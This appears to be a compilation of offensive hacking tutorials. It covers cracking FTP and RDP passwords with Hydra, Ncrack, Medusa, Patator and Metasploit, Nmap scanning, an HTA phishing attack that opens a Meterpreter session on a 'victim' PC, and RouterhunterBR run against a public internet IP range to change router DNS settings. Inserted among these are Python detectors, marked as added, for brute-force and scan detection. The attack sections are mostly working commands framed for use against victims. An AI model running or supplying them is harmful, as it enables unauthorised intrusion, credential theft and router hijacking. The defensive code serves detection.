6 Ways to Hack FTP Login Password


In this article, we will learn how to gain control over our victim's PC through the FTP port. There are various ways to do it, so let us take the time to learn them all, because different circumstances call for different measures.

Hydra
Hydra is often the tool of choice. It can perform rapid dictionary attacks against more than 50 protocols, including telnet, ftp, http, https, smb, several databases, and much more.

Now, we need to choose a wordlist. As with any dictionary attack, the wordlist is key. Kali has numerous wordlists built right in.

Run the following command

hydra -L /root/Desktop/user.txt -P /root/Desktop/pass.txt 192.168.1.103 ftp

-L: denotes the path to the username list
-P: denotes the path to the password list
Once the command is executed, it starts applying the dictionary attack, and you will have the right username and password in no time. As you can observe, we have successfully grabbed the FTP username as pavan and password as toor.




xHydra

This is the graphical version of Hydra, used to apply a dictionary attack via the FTP port. For this method to work:

Open xHydra in Kali. Select the Single Target option and enter the IP of the victim PC there. Select FTP in the box next to the Protocol option and enter port number 21 next to the Port option.




Now, go to Passwords tab and select Username List and give the path of your text file, which contains usernames, in the box adjacent to it.

Then select Password List and give the path of your text file, which contains all the passwords, in the box adjacent to it.




After doing this, go to the Start tab and click the Start button on the left.
Now the dictionary attack will start, and you will obtain the username and password of your victim.




Ncrack

Ncrack is a high-speed network authentication cracking tool. It was built to help companies secure their networks by proactively testing all their hosts and networking devices for poor passwords.
Run the following command

ncrack -v -U /root/Desktop/user.txt -P /root/Desktop/pass.txt 192.168.1.103:21

Here
-U: denotes the path to the username list
-P: denotes the path to the password list
As you can observe, we have successfully grabbed the FTP username as pavan and password as toor.




Medusa

Medusa is intended to be a speedy, massively parallel, modular login brute-forcer. It supports many protocols: AFP, CVS, FTP, HTTP, IMAP, rlogin, SSH, Subversion, and VNC, to name a few.
Run the following command
medusa -h 192.168.1.103 -U /root/Desktop/user.txt -P /root/Desktop/pass.txt -M ftp

Here
-U: denotes the path to the username list
-P: denotes the path to the password list
As you can observe, we have successfully grabbed the FTP username as pavan and password as toor.




Patator

Patator is a multi-purpose brute-forcer with a modular design and flexible usage. It is quite useful for brute-force attacks on several services such as FTP, HTTP and SMB.
patator ftp_login host=192.168.1.103 user=FILE0 0=/root/Desktop/user.txt password=FILE1 1=/root/Desktop/pass.txt




As the image below shows, the dictionary attack starts, and you obtain the username and password of your victim.




Metasploit

This module will test FTP logins on a range of machines and report successful logins. If you have loaded a database plugin and connected to a database this module will record successful logins and hosts so you can track your access.

Open a Kali terminal and type msfconsole
Now type use auxiliary/scanner/ftp/ftp_login
msf exploit (ftp_login)>set rhosts 192.168.1.103 (IP of Remote Host)
msf exploit (ftp_login)>set user_file /root/Desktop/user.txt
msf exploit (ftp_login)>set pass_file /root/Desktop/pass.txt
msf exploit (ftp_login)>set stop_on_success true
msf exploit (ftp_login)> exploit

As the image below shows, we have successfully grabbed the FTP username and password.
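
Every tool above produces the same pattern in the FTP server's log: a burst of failed logins from one client across several usernames, sometimes followed by a success. The detector below is an added example, not part of the original article; it assumes vsftpd-style log lines, and the sample lines, client addresses and thresholds are constructed for illustration.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed vsftpd-style log lines for illustration (not from the article).
SAMPLE_LOG = """\
Mon Mar  2 10:15:01 2015 [pid 4101] [admin] FAIL LOGIN: Client "192.168.1.104"
Mon Mar  2 10:15:02 2015 [pid 4103] [root] FAIL LOGIN: Client "192.168.1.104"
Mon Mar  2 10:15:03 2015 [pid 4105] [raj] FAIL LOGIN: Client "192.168.1.104"
Mon Mar  2 10:15:04 2015 [pid 4107] [pavan] FAIL LOGIN: Client "192.168.1.104"
Mon Mar  2 10:15:05 2015 [pid 4109] [pavan] OK LOGIN: Client "192.168.1.104"
Mon Mar  2 11:40:12 2015 [pid 4200] [alice] FAIL LOGIN: Client "192.168.1.50"
Mon Mar  2 11:40:30 2015 [pid 4202] [alice] OK LOGIN: Client "192.168.1.50"
"""

LINE_RE = re.compile(
    r'^(?P<ts>\w{3} \w{3} [ \d]\d \d\d:\d\d:\d\d \d{4}) \[pid \d+\] '
    r'\[(?P<user>[^\]]*)\] (?P<result>OK|FAIL) LOGIN: Client "(?P<ip>[^"]+)"')

def parse(log_text):
    """Yield (timestamp, client_ip, user, success) for every login line."""
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if m:
            ts = datetime.strptime(" ".join(m["ts"].split()), "%a %b %d %H:%M:%S %Y")
            yield ts, m["ip"], m["user"], m["result"] == "OK"

def detect(log_text, max_failures=3, window=timedelta(minutes=1)):
    """Return {ip: alert} for clients with >= max_failures failed logins in `window`.

    alert["compromised"] names the account when a success follows the burst.
    """
    recent = defaultdict(list)   # ip -> [(ts, user)] failures still inside the window
    alerts = {}
    for ts, ip, user, ok in sorted(parse(log_text)):
        recent[ip] = [(t, u) for t, u in recent[ip] if ts - t <= window]
        if ok:
            if ip in alerts and recent[ip]:      # a guess worked: treat as incident
                alerts[ip]["compromised"] = user
            continue
        recent[ip].append((ts, user))
        if len(recent[ip]) >= max_failures:
            alert = alerts.setdefault(ip, {"failures": 0, "users": set(), "compromised": None})
            alert["failures"] = max(alert["failures"], len(recent[ip]))
            alert["users"].update(u for _, u in recent[ip])
    return alerts
```

A single mistyped password followed by a successful login, as for the client 192.168.1.50 in the sample, stays below the threshold and raises no alert.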


2 Ways to Hack Remote Desktop Password using Kali Linux

Remote Desktop runs on port 3389, so in order to discover information about the RDP service we need to execute the following command:

nmap -sV 192.168.0.100


Xhydra
Open your Kali Linux terminal, type xhydra and press Enter

In the target tab, select
Single Target: 192.168.0.100

Protocol: rdp


In the Passwords tab, select

Username: type the victim's user name

Under Password, select the Password List option and browse to select your passwords file. Here I have used my custom password file.


Now select the Start tab and click the Start button; the password cracking begins, and the result is as follows


Hydra

Open a Kali Linux terminal and run the following command

hydra -l raj -P /root/Desktop/pass.txt 192.168.0.100 rdp

· -l indicates a single username (use -L for a username list)
· -P indicates use the following password list
· ^USER^ tells Hydra to use the username or list in the field

After a few minutes, Hydra cracks the password


To connect to the victim using Remote Desktop, we can use the rdesktop program

rdesktop -u -p  


Network Scanning using NMAP (Beginner Guide)

Basic Scanning Techniques

So here I will show the basic techniques for scanning a network or host. But before that, you should know some basics about the port status Nmap reports after a scan.
Port Status: After scanning, you may see some results with a port status like filtered, open, closed, etc. Let me explain this.

· Open: This indicates that an application is listening for connections on this port.
· Closed: This indicates that the probes were received but there is no application listening on this port.
· Filtered: This indicates that the probes were not received and the state could not be established. It also indicates that the probes are being dropped by some kind of filtering.
· Unfiltered: This indicates that the probes were received but a state could not be established.
· Open/Filtered (printed by Nmap as open|filtered): This indicates that the port was filtered or open but Nmap couldn't establish the state.
· Closed/Filtered (printed by Nmap as closed|filtered): This indicates that the port was filtered or closed but Nmap couldn't establish the state.
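
The port states above are what an administrator reads when auditing their own hosts for reachable login services. The parser below is an added example, not part of the original guide; it assumes the scan was saved in Nmap's grepable format (-oG), and the sample output, hosts and banners are constructed.

```python
import re

# Constructed `nmap -sV -oG -` style output; hosts and banners are invented.
SAMPLE_GNMAP = (
    "Host: 192.168.0.100 ()\tStatus: Up\n"
    "Host: 192.168.0.100 ()\tPorts: 135/open/tcp//msrpc//Microsoft Windows RPC/, "
    "445/filtered/tcp//microsoft-ds///, 3389/open/tcp//ms-wbt-server///\n"
    "Host: 192.168.0.102 ()\tStatus: Up\n"
    "Host: 192.168.0.102 ()\tPorts: 21/open/tcp//ftp//vsftpd 3.0.3/, "
    "23/closed/tcp//telnet///, 69/open|filtered/udp//tftp///\tIgnored State: closed (997)\n"
)

# Services that accept password logins and are common dictionary-attack targets.
LOGIN_SERVICES = {"ftp", "ssh", "telnet", "ms-wbt-server"}

def parse_gnmap(text):
    """Return {host: [port records]} from Nmap grepable output."""
    hosts = {}
    for line in text.splitlines():
        m = re.match(r"Host: (\S+) [^\t]*\tPorts: ([^\t]*)", line)
        if not m:
            continue                       # comment or "Status:" line
        for entry in m.group(2).split(","):
            # Field order: port/state/protocol/owner/service/rpc info/version/
            fields = entry.strip().split("/")
            if len(fields) >= 7:
                port, state, proto, _, service, _, version = fields[:7]
                hosts.setdefault(m.group(1), []).append(
                    {"port": int(port), "state": state, "proto": proto,
                     "service": service, "version": version})
    return hosts

def audit(hosts):
    """Per host: login services confirmed open, and ports Nmap could not decide on."""
    report = {}
    for host, ports in hosts.items():
        report[host] = {
            "exposed_logins": [(p["port"], p["service"]) for p in ports
                               if p["state"] == "open" and p["service"] in LOGIN_SERVICES],
            "undetermined": [(p["port"], p["state"]) for p in ports
                             if p["state"] in ("filtered", "open|filtered", "closed|filtered")],
        }
    return report
```

Ports listed as undetermined need a follow-up check from a different network position, because a filtering device may be hiding a service that is still reachable from elsewhere.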

Open a Kali Linux terminal and type nmap to list all Nmap options

Find All Connected PC (Ping Scan)

The -sP option runs a ping-only scan (newer Nmap releases call this option -sn). It is most useful when you have a group of IP addresses and you don't know which ones are reachable.

nmap -sP -T4 192.168.0.1/24

Note:

-T: used to change the speed of the scan. A slower scan yields better results.


Multiple IP Scan

nmap -sn 192.168.0.1/24


TCP Ports Scan

TCP connect scan is the default TCP scan type when SYN scan is not an option. It will show you all open TCP ports on the remote PC.

Single IP Scan
nmap -sT 192.168.0.102


Multiple IP Scan

nmap -sT 192.168.0.1/24


Detect Service Version

In this scan you can find the version of the service that is running on each open port. This is done using multiple techniques like banner grabbing, reading server headers and sending specific requests.

Single Host Service Scanning

nmap -sV 192.168.0.102


Multiple Hosts Scanning

nmap -sV -T4 192.168.0.1/24


Detect Operating System

In this scan you can find the operating system installed on a PC on the network.

Single Host Scanning



nmap -O 192.168.0.102


Multiple Hosts Scanning

nmap -O -T4 192.168.0.1/24



Detect Protocol

In this scan you can find the PROTOCOL, STATE and SERVICE for each PC on the network.

nmap -sO -T4 192.168.0.1/24


Aggressive Scan (Also Works for Traceroute)

For Single Host

The aggressive scan enables the most commonly used options; it is a simple alternative to writing long option strings. It also performs a traceroute, etc.

nmap -A 192.168.0.102


Multiple Hosts Scanning

nmap -A -T4 192.168.0.1/24


UDP Ping Scan

The -sU option runs a UDP scan against the target. It will show you all open UDP ports on the remote PC.

nmap -sU -T4 192.168.0.102


SYN Scan

A SYN scan completes only two steps of the three-way handshake, so there is no chance of closing or crashing the target, and it goes undetected by older systems. It can be performed quickly, scanning thousands of ports per second on a fast network not hampered by restrictive firewalls.

nmap -sS 192.168.0.113
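
The difference between the connect scan (-sT) and the SYN scan (-sS) is visible on the wire: the first finishes the handshake with an ACK, the second resets after the server's SYN/ACK. The classifier below is an added example, not part of the original guide; the packet summaries, addresses and the min_ports threshold are constructed, and the verdict is a simple heuristic rather than a full IDS rule.

```python
from collections import defaultdict

def attempt(client, server, cport, sport, port_open, completes):
    """Constructed packet summaries (src, dst, sport, dport, flags) for one connection."""
    pkts = [(client, server, cport, sport, "S")]
    if not port_open:
        return pkts + [(server, client, sport, cport, "RA")]   # closed port replies RST
    pkts.append((server, client, sport, cport, "SA"))
    # Step 3 is an ACK for a full connect; a half-open probe sends RST instead.
    return pkts + [(client, server, cport, sport, "A" if completes else "R")]

# Constructed traffic: .50 probes half-open, .51 uses full connects, .60 is an FTP user.
OPEN = {21, 80, 3389}
TRAFFIC = []
for i, port in enumerate([21, 22, 23, 80, 3389]):
    TRAFFIC += attempt("192.168.0.50", "192.168.0.113", 40000 + i, port, port in OPEN, False)
    TRAFFIC += attempt("192.168.0.51", "192.168.0.113", 50000 + i, port, port in OPEN, True)
TRAFFIC += attempt("192.168.0.60", "192.168.0.113", 51515, 21, True, True)

def classify_sources(packets, min_ports=4):
    """Return {client: "syn-scan" | "connect-scan"} for clients probing >= min_ports ports."""
    stage = {}                                         # (client, server, cport, sport) -> stage
    seen = defaultdict(lambda: defaultdict(set))       # client -> outcome -> {(server, port)}
    for src, dst, sport, dport, flags in packets:
        fwd, rev = (src, dst, sport, dport), (dst, src, dport, sport)
        if flags == "S":
            stage[fwd] = "syn"
        elif flags == "SA" and stage.get(rev) == "syn":
            stage[rev] = "synack"
        elif flags == "A" and stage.get(fwd) == "synack":
            stage[fwd] = "established"
            seen[src]["completed"].add((dst, dport))
        elif "R" in flags and stage.get(fwd) == "synack":
            seen[src]["half_open"].add((dst, dport))   # client aborted after SYN/ACK
        elif "R" in flags and stage.get(rev) == "syn":
            seen[dst]["refused"].add((src, sport))     # server refused: port closed
    verdicts = {}
    for client, outcome in seen.items():
        targets = set().union(*outcome.values())
        if len(targets) >= min_ports:
            # Heuristic: half-open probes with no completed handshakes indicate a SYN scan.
            half_only = outcome["half_open"] and not outcome["completed"]
            verdicts[client] = "syn-scan" if half_only else "connect-scan"
    return verdicts
```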

Exploit Remote Windows PC using HTA Attack with Net Tools

Open your Kali Linux terminal and type the following command

git clone git://git.code.sf.net/p/netoolsh/opensource-kali netoolsh-opensource-kali


Open a terminal, type ./netool.sh and press Enter to continue.


Now it will ask you for your choice. Press 8; a pop-up will open, click Yes.


You can see lots of attack options. Choose 4, Powershell (Relik).


Now a pop-up will open. Choose a PowerShell payload (powershell.hta), then click OK.


Again a pop-up will open. Enter the IP address of your Kali Linux PC and click OK.


Now it will ask for a port number. Enter the port number, such as 4444, and click OK.


Enter the target IP address and press Enter.


Click Yes to start a listener.


Now it will execute a TCP handler on 192.168.0.103 and start the payload handler.


When the victim machine browses to your link, it will download the launcher.hta file; when the victim clicks on it, you will get the meterpreter session.


Now that the session has opened, type sysinfo to get system information, then type shell to enter the victim's command prompt.
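
On the victim side, an opened .hta file runs inside mshta.exe, so a PowerShell payload delivered this way shows up as a script interpreter with mshta.exe in its process ancestry. The check below is an added example, not part of the original article; it assumes process-creation events with Sysmon Event ID 1 style field names, and the events, PIDs and paths are constructed with the payload command lines redacted.

```python
import ntpath

def ev(pid, ppid, image, cmdline):
    """Build one event with Sysmon Event ID 1 style field names (assumed log schema)."""
    return {"ProcessId": pid, "ParentProcessId": ppid, "Image": image, "CommandLine": cmdline}

PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
# Constructed events: a user opens launcher.hta from the browser; payloads are redacted.
EVENTS = [
    ev(500, 4, r"C:\Windows\explorer.exe", "explorer.exe"),
    ev(610, 500, PS, "powershell.exe"),                      # console opened by the user
    ev(700, 500, r"C:\Program Files\Internet Explorer\iexplore.exe", "iexplore.exe"),
    ev(710, 700, r"C:\Windows\System32\mshta.exe", r'mshta.exe "C:\Users\raj\Downloads\launcher.hta"'),
    ev(720, 710, r"C:\Windows\System32\cmd.exe", "cmd.exe /c <redacted>"),
    ev(730, 720, PS, "powershell.exe <redacted>"),
]

INTERPRETERS = {"powershell.exe", "cmd.exe", "wscript.exe", "cscript.exe"}

def find_hta_spawned(events):
    """Return interpreters that have mshta.exe anywhere in their ancestry."""
    by_pid = {e["ProcessId"]: e for e in events}   # assumes no PID reuse in this batch
    name = lambda e: ntpath.basename(e["Image"]).lower()
    hits = []
    for e in events:
        if name(e) not in INTERPRETERS:
            continue
        chain, pid, visited = [name(e)], e["ParentProcessId"], set()
        while pid in by_pid and pid not in visited:        # walk up, guarding against loops
            visited.add(pid)
            parent = by_pid[pid]
            chain.append(name(parent))
            if name(parent) == "mshta.exe":
                hits.append({"pid": e["ProcessId"], "chain": chain[::-1],
                             "hta_command": parent["CommandLine"]})
                break
            pid = parent["ParentProcessId"]
    return hits
```

Walking the whole ancestry rather than only the direct parent also catches the case where the HTA starts cmd.exe first and PowerShell second, while the PowerShell console started from explorer.exe is left alone.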

Find the Vulnerable Router on Internet using RouterhunterBR

RouterhunterBR is an automated security tool that finds vulnerabilities and performs tests on routers and vulnerable devices on the Internet. It was designed to run over the Internet, looking in defined IP ranges or random ones, in order to automatically exploit the DNSChanger vulnerability on home routers.

The script explores four vulnerabilities in routers:
01 - Shuttle Tech ADSL Modem-Router 915 WM / Unauthenticated Remote DNS Change Exploit
reference: http://www.exploit-db.com/exploits/35995/

02 - D-Link DSL-2740R / Unauthenticated Remote DNS Change Exploit
reference: http://www.exploit-db.com/exploits/35917/

03 - LG DVR LE6016D / Unauthenticated users/passwords disclosure exploit
reference: http://www.exploit-db.com/exploits/36014/

04 - D-Link DSL-2640B Unauthenticated Remote DNS Change Exploit
reference: http://1337day.com/exploit/23302/

Open your Kali Linux terminal and type the following command


./routerhunter.py --range '182.75.*.*' --dns1 8.8.8.8 --dns2 8.8.4.8


Legal disclaimer: Usage of RouterHunterBR for attacking targets without prior mutual consent is illegal.
It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program.